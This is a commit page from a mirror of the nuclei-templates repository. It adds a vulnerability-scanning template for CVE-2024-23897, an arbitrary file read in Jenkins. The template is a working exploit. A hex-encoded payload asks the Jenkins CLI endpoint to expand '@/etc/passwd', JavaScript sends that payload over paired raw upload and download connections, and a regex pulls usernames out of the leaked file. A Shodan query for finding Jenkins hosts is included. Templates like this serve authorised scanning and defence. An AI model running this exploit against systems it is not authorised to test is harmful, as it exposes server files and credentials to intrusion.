daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read) (#9025) 

* Added CVE-2024-23897 (Jenkins < 2.441 - Arbitrary File Read)

* added extractor
patch-1
Sandeep Singh 2024-01-28 16:16:42 +05:30 committed by GitHub
parent e74af38f8d
commit 3e1146db31
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 45 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
javascript/cves/2024/CVE-2024-23897.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2024-23897
info:
name: Jenkins < 2.441 - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
reference:
- https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
- https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
metadata:
verified: true
shodan-query: product:"Jenkins"
product: jenkins
vendor: jenkins
tags: cve,cve2024,lfi,rce,jenkins
variables:
payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}"
javascript:
- code: |
let m = require('nuclei/net');
let name=(Host.includes(':') ? Host : Host+":80");
let conn,conn2;
try { conn = m.OpenTLS('tcp', name) } catch { conn= m.Open('tcp', name)}
conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');
try { conn2 = m.OpenTLS('tcp', name) } catch { conn2= m.Open('tcp', name)}
conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)
resp = conn.RecvString(1000)
args:
Body: "{{payload}}"
Host: "{{Hostname}}"
matchers:
- type: dsl
dsl:
- 'contains(response, "No such agent \"")'
extractors:
- type: regex
group: 1
regex:
- '\b([a-z_][a-z0-9_-]{0,31})\:x\:'